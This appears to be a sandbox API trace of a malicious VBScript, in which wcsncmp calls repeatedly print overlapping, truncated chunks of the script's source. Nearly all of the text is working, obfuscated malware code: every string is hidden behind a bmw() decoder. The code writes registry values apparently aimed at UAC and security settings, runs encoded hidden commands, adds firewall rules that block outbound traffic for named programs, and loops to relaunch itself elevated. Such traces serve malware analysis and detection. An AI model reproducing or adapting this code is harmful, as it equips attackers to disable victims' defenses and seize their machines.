bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 33 [0226.367] wcsncmp (_String1="Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 65 [0226.367] wcsncmp (_String1="ame = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 84 [0226.367] wcsncmp (_String1="me = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 96 [0226.368] wcsncmp (_String1="e = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0226.368] wcsncmp (_String1=" = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite 